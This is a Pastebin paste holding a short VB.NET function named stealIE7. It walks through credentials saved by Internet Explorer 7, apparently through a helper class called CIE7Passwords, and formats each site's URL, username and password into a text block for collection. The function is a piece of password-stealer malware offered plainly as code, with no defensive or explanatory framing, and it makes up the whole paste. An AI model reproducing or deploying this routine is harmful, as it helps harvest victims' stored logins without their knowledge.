Advertisement
Guest User

Untitled

a guest
May 26th, 2017
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.69 KB | None | 0 0
  1. Private PIESEVEN As New CIE7Passwords
  2. Dim iep7 As CIE7Password
  3.  
  4. Public Function stealIE7() As String
  5.  
  6. Dim out As String = ""
  7. For Each iep7 In PIESEVEN
  8.  
  9. out = out & vbNewLine & (" URL: " & iep7.URL)
  10. out = out & vbNewLine & ("User:" & iep7.UserName)
  11. out = out & vbNewLine & ("Pass:" & iep7.Password)
  12. out = out & vbNewLine & ("Desc: " & iep7.Description)
  13. out = out & vbNewLine
  14. Next iep7
  15.  
  16. If out = "" Then Return Nothing
  17.  
  18. Return _
  19. "===============IE7 PASSWORDS===============" & out & _
  20. "===============END IE7 PASSWORDS===============" & vbNewLine & vbNewLine
  21. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement